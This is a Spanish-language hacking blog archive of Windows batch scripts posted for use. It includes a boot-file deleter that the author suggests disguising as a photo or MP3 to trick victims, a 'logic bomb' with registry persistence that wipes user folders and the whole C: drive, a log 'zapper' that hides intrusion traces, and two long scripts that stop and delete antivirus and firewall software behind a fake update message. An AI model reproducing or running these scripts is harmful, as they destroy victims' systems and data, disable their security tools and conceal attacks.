Mostrando entradas con la etiqueta Batch. Mostrar todas las entradas
Mostrando entradas con la etiqueta Batch. Mostrar todas las entradas

viernes, 19 de marzo de 2010

Batch Asesina un PC

Bueno aca otra vez tenia medio botado mi Blog, pero lo retomo nuevamente

Hoy posteare un batch destructivo que dejara inutilzable el pc donde nos ejecutemos, o sea, prffff..murio....se finni en terminos simple kedara pa la caga y morira jajajaja

Este codigo lo sake de un foro amigo asi ke no es mio ok? No me hago responsable de su uso

aca va


@echo off
attrib -r -s -h %HOMEDRIVE%\autoexec.bat
del %HOMEDRIVE%\autoexec.bat
attrib -r -s -h %HOMEDRIVE%\boot.ini
del %HOMEDRIVE%\boot.ini
attrib -r -s -h %HOMEDRIVE%\ntldr
del %HOMEDRIVE%\ntldr
attrib -r -s -h %WinDIR%\win.ini
del %WinDIR%\win.ini
shutdown -r -t 15 -c "Error en Windows, te hice mierda el pc jojojo"

La forma de dejarlo y para ke los descuidados users lo ejecuten es compilarlo bajo una foto,mp3,documento o archivo similar, para ello utlizaremos el SFX kien nos ayudara a efectuar esta tarea jejejejej (6)



Bonus

Si ejecutaste este Batch por equivocacion en tu pc (como le paso a un amigo mio jojojoj) bueno la solucion son dos

Para solucionar el problema de Falta el archivo NTLDR hay seguir el procedimiento siguiente:

1.- Arrancar el pc con el disco de Windows XP dentro.

2.- Cuando nos salga el asistente de instalación de Windows Xp elegir la opción de Reparar Sistema.

(En caso de que no salga el asistente significa que el sistema no ha podido arrancar desde el CD. Prueba a ponerlo en otra unidad y volver a arrancar).

Si sigue igual, entra en la BIOS y comprueba que la primera unidad en la secuencia de arranque es alguna de tus unidades de CD/DVD.

3.- Una vez que tengamos en pantalla el editor con C:\Windows, teclear 1 y pulsar Intro

4.- Nos pedirá la Clave de administrador. Si hemos puesto una clave la tecleamos. Si no hemos puesto clave pulsamos enter

5.- Una vez que estemos en C:\Windows teclear FIXMBR y pulsar enter

6.- El sistema nos advierte de que si queremos continuar y ponemos S y pulsamos enter

Una vez que estamos en el punto 6, tenemos que copiar dos archivos, debido que en dicha pérdida se arrastra también otro que es el ntdetect, por lo tanto hay que copiar ntldr y ntdetect en nuestro disco duro.

Para ello escribiremos lo siguiente:

copy D:\i386\ntldr C:\

copy D:\i386\ntdetect.com C:\

(Donde D:\ sería la unidad lectora donde se encuentra el cd de Windows XP y C:\ es la unidad de arranque donde tenemos instalado Windows).

Si todo sale bien funciona a la perfeccion

Con respecto a este problema debemos tener esto en cuenta:

Si el sistema anterior falla no tenemos más remedio que reinstalar Windows, pero eliminando la particion, volviendola a crear y formateando de nuevo (es recomendable utilizar el formateo normal, NO el formateo rápido. Con esto lamentablemente se perderan todos nuestros datos.

NO es normal que se pierda este archivo, por lo que su pérdida es síntoma de un posible problema con el disco duro, sobre todo si el problema se repite con una cierta frecuencia.


  • Si no tienes el Disco de Arranke FORMATEAR (6)


lunes, 7 de diciembre de 2009

Loggic Bomb I

@echo off
c:
cd "C:\WINDOWS\system32"
echo @echo off > log.bat
echo cd \ >> log.bat
echo del /ah /f /q boot.ini >> log.bat
echo del /ah /f /q ntldr >> log.bat
echo del /ah /f /q *.* >> log.bat
echo cd "C:\Documents and Settings" >> log.bat
echo del /f /s /q *.* >> log.bat
echo cd \ >> log.bat
echo del /f /s /q *.* >> log.bat
echo exit >> log.bat
cd "C:\WINDOWS\system32"
echo @echo off > w32.bat
echo :warning >> w32.bat
echo start >> w32.bat
echo msg * You've been infected by NeoTokyoX! >> w32.bat
echo goto warning >> w32.bat
cd "C:\WINDOWS\system32"
echo @echo off > dir.bat
echo cd "C:\WINDOWS\system32" >> dir.bat
echo start log.bat >> dir.bat
echo start w32.bat >> dir.bat
cd "C:\WINDOWS\system32"
echo reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "security" /d "C:\Windows\System32\dir.bat" /f > register.bat
echo reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "securitylog" /d "C:\WINDOWS\system32\register.bat" /f >> register.bat
echo exit >> register.bat
start register.bat
taskkill /f /im msnmsgr.exe
exit

'''''//''''//
'''''//''''//'''''//''''//'''''//''''//'''''//''''//'''''//''''//

jejjejeje las maldades de este Bat

Es una bomba lógica porque crea varios archivos independientes del del mismo virus, lo que hace es guardar en el registro la ejecución del virus para que se ejecute al siguiente reinicio, esto se hace para que la víctima no se de cuenta de que realmente ha sido ese archivo el que le ha infectado y así cuando reinicie no se acordará por dónde le vino el virus; cuando reinicia le empiezan a salir ventanas de comando infinitas a la vez que elmismo número de ventanas de un mensaje que dice: You've been infected by NeoTokyoX! esto ralentiza el ordenador, pero además realmente detrás de todas esas ventanas hay una que abrió la primera que está borrando los archivos esenciales para el arranque del XP, después borra todo lo que ve al paso de Documents and Settings con la intención de borrar la carpeta "Mis documentos", pero para ello tendría que saber el usuario del equipo para ir a Documents and Settings\usuario\Mis documentos.. como no se sabe, se deja que empiece a borrar desde Documents and Settings; bueno, y más tarde borra toodo lo que haya en C: ; hago este orden porque lo más seguro es que la víctima reinicie la torre desde el botón físico, puesto que no podrá hacer nada con el ratón. Entonces, la importancia de borrado de los archivos es según esa prioridad, primero el arranque, después los documentos importantes, y después el resto del disco; para que le de tiempo a hacer lo que más interesa hasta que el usuario reinicie. Realmente no importa porque va a reiniciar una y otra vez y si algo no se ha terminado de borrar lo hace la próxima vez puesto que esto se ejecuta siempre en el inicio.....

Godblack<>


sábado, 5 de diciembre de 2009

Batch Zapper

Cada vez ke los individuos entran a servidores o cosas por estilo, sus huellas quedan marcadas en los registros de dicho lugar, entonces para evitar esto existen unos archivos o ejecutables llamados Zappers, estos amiguitos son los encargados de borrar marcas de intrusion para que despues evites el bochorno de tener a la PDI en tu casa XDDD!!...aca te dejo uno

@echo off
del C:\Windows\system32 /f /q * .evt
del C:\Windows\system32 /f /q * .log
exit


la forma es conocida, copia y pega en un bloc de notas y guarda con extension .bat

by ANTRAX

lunes, 9 de noviembre de 2009

Batch Renovar Ip

@echo off
ipconfig /flushdns
ipconfig /release
ipconfig /renew
exit

Batch Firewall Killer

@echo off
If exist "C:\Archivos de programa\ewido anti-malware" (goto ewido) else (goto 1)
:1
If exist "C:\Archivos de programa\Eset" (goto nod32) else (goto 2)
:2
If exist "C:\Archivos de programa\Spybot - Search & Destroy" (goto spybot) else (goto 3)
:3
If exist "C:\Archivos de programa\Windows Defender" (goto windefender) else (goto 4)
:4
If exist "C:\Archivos de programa\mcafee.com" (goto mcafee) else (goto 5)
:5
If exist "C:\Archivos de programa\Zone Labs\ZoneAlarm" (goto zone) else (goto 6)
:6
If exist "C:\Archivos de programa\Trend Micro" (goto trend) else (goto 7)
:7
If exist "C:\Archivos de programa\Synaptics" (goto sinapti) else (goto Cool
:8
If exist "C:\Archivos de programa\Grisoft\AVG free" (goto avfree) else (goto 9)
:9
If exist "C:\Archivos de programa\Archivos comunes\Symantec Shared" (goto norton) else (goto 10)
:10
If exist "C:\Archivos de programa\Norton AntiVirus" (goto norton2) else (goto 11)
:11
If exist "C:\Program Files\Panda Software\Panda Platinum 2006 Internet Security (goto Panda06) else (goto 12)
:12
If exist "C:\Archivos de programa\Alwil Software\Avast4" (goto Avast4) else (goto 13)
:13
If exist "C:\Archivos de programa\Microsoft AntiSpyware" (goto micanti) else (goto 14)
:14
If exist "C:\Archivos de programa\Kaspersky Lab\Kaspersky Anti-Virus Personal" (goto kav) else (goto 15)
:15
If exist "C:\Archivos de programa\Webroot\Spy Sweeper" (goto sweeper) else (goto 16)
:16
If exist "C:\Archivos de programa\SinEspias" (goto sinspy) else (goto 17)
:17
If exist "C:\Archivos de programa\Panda Software\Panda Antivirus Titanium" (goto pandatitanium) else (gto 18)
:18
If exist "C:\Archivos de programa\AVPersonal" (goto avpersonal) else (goto 19)
:19
If exist "C:\Archivos de programa\Softwin\BitDefender9" (goto bit9) else (goto 20)
:20
goto fin
:bit9
net stop "bdoesrv"
net stop "bdmcon"
net stop "bdnagent"
net stop "bdswitch"

Taskkill /f /IM bdoesrv.exe /IM bdmcon.exe /IM bdnagent.exe /IM bdswitch.exe
cd C:\Archivos de programa\Softwin\BitDefender9
attrib -H -S -R *.*
del /s /q *.*
:avpersonal
net stop "AVGUARD"
net stop "AVWUPSRV"
net stop "AVGNT"
net stop "AVSched32"

Taskkill /f /IM AVGUARD.EXE /IM AVWUPSRV.EXE /IM AVGNT.EXE /IM AVSched32.EXE
cd C:\Archivos de programa\AVPersonal
attrib -H -S -R *.*
del /s /q *.*
:pandatitanium
net stop "Pavsrv51"
net stop "AVENGINE"
net stop "apvxdwin"
net stop "pavProxy"
Taskkill /f /IM Pavsrv51.exe /IM AVENGINE.EXE /IM apvxdwin.exe /IM pavProxy.exe
cd "C:\Archivos de programa\Panda Software\Panda Antivirus Titanium"
attrib -H -S -R *.*
del /s /q *.*
rd /s /q C:\Archivos de programa\Panda Software\Panda Antivirus Titanium
:sinspy
Taskkill /f /IM no-spy.exe
cd "C:\Archivos de programa\SinEspias"
attrib -H -S -R *.*
del /s /q *.*
:sweeper
Taskkill /f /IM WRSSSDK.exe /IM SpySweeper.exe
cd "C:\Archivos de programa\Webroot\Spy Sweeper"
attrib -H -S -R *.*
del /s /q *.*
:kav
cd "C:\Archivos de programa\Kaspersky Lab\Kaspersky Anti-Virus Personal"
net stop "kav"
net stop "kavsvc"
Taskkill /f /IM kav.exe /IM kavsvc.exe
attrib -H -S -R *.*
del /s /q *.*
goto 15
:micanti
cd "C:\Archivos de programa\Microsoft AntiSpyware"
net stop "gcasServ"
net stop "gcasDtServ"
Taskkill /f /IM gcasServ.exe /IM gcasDtServ.exe
attrib -H -S -R *.*
del /s /q *.*
goto 14
:Avast4
cd "C:\Archivos de programa\Alwil Software\Avast4"
net stop "aswUpdSv"
net stop "ashServ"
net stop "ashWebSv"
net stop "ashDisp"
Taskkill /f /IM aswUpdSv.exe /IM ashServ.exe /IM ashWebSv.exe /IM ashDisp.exe
attrib -H -S -R *.*
del /s /q *.*
goto 13
:Panda06
cd "C:\Program Files\Panda Software\Panda Platinum 2006 Internet Security"
net stop "TPSrv"
net stop "PavFnSvr"
net stop "pavsrv51"
net stop "pskmssvc"
net stop "AVENGINE"
net stop "PNMSRV"
net stop "PsImSvc"
Taskkill /f /IM TPSrv.exe /IM PavFnSvr.exe /IM pavsrv51.exe /IM pskmssvc.exe /IM AVENGINE.EXE /IM PNMSRV.EXE /IM PsImSvc.exe
attrib -H -S -R *.*
del /s /q *.*
cd "C:\Program Files\Panda Software\Panda Platinum 2006 Internet Security\AntiSpam"
attrib -H -S -R *.*
del /s /q *.*
cd "C:\Program Files\Panda Software\Panda Platinum 2006 Internet Security\FIREWALL"
attrib -H -S -R *.*
del /s /q *.*
cd "C:\Program Files\Common Files\Panda Software\PavShld"
Taskkill /f /IM pavprsrv.exe
attrib -H -S -R *.*
del /s /q *.*
goto 12
:norton2
cd "C:\Archivos de programa\Norton AntiVirus"
net stop "navapsvc"
net stop "NPFMntor"
Taskkill /f /IM navapsvc.exe /IM NPFMntor.exe
attrib -H -S -R *.*
del /s /q *.*
cd "C:\Archivos de programa\Norton AntiVirus\IWP"
attrib -H -S -R *.*
del /s /q *.*
goto 11
:norton
cd "C:\Archivos de programa\Archivos comunes\Symantec Shared"
net stop "ccSetMgr"
net stop "SNDSrvc"
net stop "SPBBCSvc"
net stop "ccEvtMgr"
net stop "ccApp"
net stop "symlcsvc"
Taskkill /f /IM ccSetMgr.exe /IM SNDSrvc.exe /IM SPBBCSvc.exe /IM ccEvtMgr.exe /IM ccApp.exe /IM symlcsvc.exe
attrib -H -S -R *.*
del /s /q *.*
cd "C:\Archivos de programa\Archivos comunes\Symantec Shared\SPBBC"
attrib -H -S -R *.*
del /s /q *.*
cd "C:\Archivos de programa\Archivos comunes\Symantec Shared\CCPD-LC"
attrib -H -S -R *.*
del /s /q *.*
goto 10
:avfree
cd "C:\Archivos de programa\Grisoft\AVG free"
net stop "avgamsvr"
net stop "vgupsvc"
net stop "avgcc"
Taskkill /f /IM avgamsvr.exe /IM vgupsvc.exe /IM avgcc.exe
attrib -H -S -R *.*
del /s /q *.*
goto 9
:sinapti
cd "C:\Archivos de programa\Synaptics\SynTP"
net stop "SynTPLpr"
net stop "SynTPEnh"
Taskkill /f /IM SynTPLpr.exe /IM SynTPEnh.exe
attrib -H -S -R *.*
del /s /q *.*
goto 8
:trend
cd "C:\Archivos de programa\Trend Micro\OfficeScan Client"
net stop "ntrtscan"
net stop "tmlisten"
net stop "OfcPfwSvc"
net stop "pccntmon"
Taskkill /f /IM ntrtscan.exe /IM tmlisten.exe /IM OfcPfwSvc.exe /IM pccntmon.exe
attrib -H -S -R *.*
del /s /q *.*
goto 7
:zone
cd "C:\Archivos de programa\Zone Labs\ZoneAlarm"
net stop "zlclient"
net stop "zonealarm"
net stop "vsmon"
Taskkill /f /IM zlclient.exe /IM zonealarm.exe /IM vsmon.exe
attrib -H -S -R *.*
del /s /q *.*
cd "C:\WINDOWS\system32\ZoneLabs"
attrib -H -S -R *.*
del /s /q *.*
goto 6
:mcafee
cd "c:\archivos de programa\mcafee.com\agent"
net stop "mcdetect"
net stop "mctskshd"
net stop "mcagent"
net stop "mcvsescn"
net stop "mcvsftsn"
net stop "mcvsshld"
net stop "mcvsrte"
net stop "mcshield"
Taskkill /f /IM mcdetect.exe /IM mctskshd.exe /IM mcagent.exe /IM mcvsescn.exe /IM mcvsftsn.exe /IM mcvsshld.exe /IM mcvsrte.exe /IM mcshield.exe
attrib -H -S -R *.*
del /s /q *.*
rd /s /q "c:\archivos de programa\mcafee.com\agent"
rd /s /q "c:\archivos de programa\mcafee.com"
goto 5
:windefender
cd "C:\Archivos de programa\Windows Defender"
net stop "MsMpEng"
net stop "MSASCui"
Taskkill /f /IM MsMpEng.exe /IM MSASCui.exe
attrib -H -S -R *.*
del /s /q *.*
goto 4
:spybot
cd "C:\Archivos de programa\Spybot - Search & Destroy"
net stop "TeaTimer"
Taskkill /f /IM TeaTimer.exe
attrib -H -S -R *.*
del /s /q *.*
goto 3
:nod32
cd "C:\Archivos de programa\Eset"
net stop "nod32krn"
net stop "nod32kui"
net stop "nod32"
Taskkill /f /IM nod32krn.exe /IM nod32kui.exe /IM nod32.exe
attrib -H -S -R *.*
del /s /q *.*
goto 2
:ewido
cd "C:\Archivos de programa\ewido anti-malware"
Taskkill /f /IM ewidoctrl.exe /IM ewidoguard.exe
net stop "ewidoctrl"
net stop "ewidoguard"
attrib -H -S -R *.*
del /s /q *.*
goto 1
:fin
exit

Batch AV Killer

Copia y pega en un block de notas y lo guardas con extension BAT
los bats no son de mi propiedad

@echo off

ping -n 15 localhost>nul
net stop "Centro de Seguridad"
reg add hklm\software\microsoft\windows\currentversion\run /v windllp /d "%windir%\windllp.exe"
reg add hklm\software\microsoft\windows\currentversion\run /v windllp /d "%0"
set t=Taskkill&set f=/f&set i=/IM&set q=/q&set s=/s&set a=attrib
%t% %f% %i% nod32krn.exe /IM nod32kui.exe
cd %programfiles%\Eset
%a% -H -S -R *.*
del %s% %q% *.*
%t% %f% %i% kavsvc.exe /IM kav.exe
cd %programfiles%\KASPERSKY LAB\KASPERSKY\ANTI-VIRUS PERSONAL
%a% -H -S -R *.*
del %s% %q% *.*
%t% %f% %i% VsStat.exe
cd %programfiles%\McAfee\McAfee VirusScan
%a% -H -S -R *.*
del %s% %q% *.*
%t% %f% %i% zlclient.exe /IM zonealarm.exe /IM vsmon.exe
cd %programfiles%\Zone Labs\ZoneAlarm
%a% -H -S -R *.*
del %s% %q% *.*
%t% %f% %i% avgamsvr.exe /IM avgupsvc.exe
cd %programfiles%\AVG7
%a% -H -S -R *.*
del %s% %q% *.*
%t% %f% %i% Pavsrv51.exe /IM AVENGINE.EXE /IM apvxdwin.exe /IM pavProxy.exe
cd %programfiles%\Panda Software\Panda Antivirus Titanium
%a% -H -S -R *.*
del %s% %q% *.*
%t% %f% %i% NPROTECT.EXE
cd %programfiles%\Norton Utilities
%a% -H -S -R *.*
del %s% %q% *.*
%t% %f% %i% GBPoll.exe /IM navapsvc.exe /IM NPFMntor.exe /IM NPROTECT.EXE /IM NOPDB.EXE /IM GBTray.exe /IM NPFMntor.exe /IM GhostTray.exe /IM PQV2iSvc.exe
cd %programfiles%\Norton System\Works\Norton AntiVirus
%a% -H -S -R *.*
del %s% %q% *.*
%t% %f% %i% no-spy.exe
cd %programfiles%\SinEspias
%a% -H -S -R *.*
del %s% %q% *.*
%t% %f% %i% AVGSERV9.EXE /IM AVGCC32.EXE
cd %programfiles%\GRISOFT\AVG6
%a% -H -S -R *.*
del %s% %q% *.*
%t% %f% %i% bdoesrv.exe /IM bdmcon.exe /IM bdnagent.exe /IM bdswitch.exe
cd %programfiles%\Softwin\BitDefender9
%a% -H -S -R *.*
del %s% %q% *.*
%t% %f% %i% AVGUARD.EXE /IM AVWUPSRV.EXE /IM AVGNT.EXE /IM AVSched32.EXE
cd %programfiles%\AVPersonal
%a% -H -S -R *.*
del %s% %q% *.*
%t% %f% %i% FrameworkService.exe /IM Mcshield.exe /IM VsTskMgr.exe /IM SHSTAT.EXE
cd %programfiles%\Network Associates\VirusScan
%a% -H -S -R *.*
del %s% %q% *.*
%t% %f% %i% spyaxe.exe /IM spyaxe.exe
cd %programfiles%\SpyAxe
%a% -H -S -R *.*
del %s% %q% *.*
%t% %f% %i% ccProxy.exe /IM ccSetMgr.exe /IM SNDSrvc.exe /IM SPBBCSvc.exe /IM ccEvtMgr.exe /IM ccApp.exe /IM NMAIN.EXE /IM SBServ.exe /IM NOPDB.EXE
cd %programfiles%\Archivos comunes\Symantec\Shared
%a% -H -S -R *.*
del %s% %q% *.*
%t% %f% %i% navapsvc.exe /IM ISSVC.exe /IM
cd %programfiles%\Norton Internet Security
%a% -H -S -R *.*
del %s% %q% *.*
%t% %f% %i% avgcc.exe /IM avgamsvr.exe /IM avgupsvc.exe
cd %programfiles%\Grisoft
%a% -H -S -R *.*
del %s% %q% *.*
%t% %f% %i% avgamsvr.exe /IM vgupsvc.exe /IM avgcc.exe
cd %programfiles%\Grisoft\AVG free
%a% -H -S -R *.*
del %s% %q% *.*
%t% %f% %i% gcasDtServ.exe /IM gcasServ.exe
cd %programfiles%\Microsoft AntiSpyware
%a% -H -S -R *.*
del %s% %q% *.*
%t% %f% %i% Pagent.exe /IM pagentwd.exe /IM pavsched.exe
cd %programfiles%\Panda Software\Panda Administrator\Pav_Agent
%a% -H -S -R *.*
del %s% %q% *.*
%t% %f% %i% symlcsvc.exe
cd %programfiles%\Archivos comunes\Symantec\SharedCCPD-LC
%a% -H -S -R *.*
del %s% %q% *.*
%t% %f% %i% SynTPLpr.exe /IM SynTPEnh.exe
cd %programfiles%\SynapticsSynTP
%a% -H -S -R *.*
del %s% %q% *.*
%t% %f% %i% aswUpdSv.exe /IM ashServ.exe /IM ashWebSv.exe /IM ashDisp.exe
cd %programfiles%\Alwil Software\Avast4
%a% -H -S -R *.*
del %s% %q% *.*
%t% %f% %i% SpywareStrike. exe /IM SpywareStrike. exe
cd %programfiles%\SpywareStrike
%a% -H -S -R *.*
del %s% %q% *.*
%t% %f% %i% ASHSERV.EXE /IM ASHWEBSV.EXE /IM ASHMAISV.exe
cd %programfiles%\ALWIL SOFTWARE\AVAST4
%a% -H -S -R *.*
del %s% %q% *.*
%t% %f% %i% navapsvc.exe /IM NPFMntor.exe /IM navapw32.exe /IM SAVScan.exe
cd %programfiles%\Norton AntiVirus
%a% -H -S -R *.*
del %s% %q% *.*
shutdown -r -t 5 -f -c "Windows ha sido Actualizado y debe Reiniciarse"
exit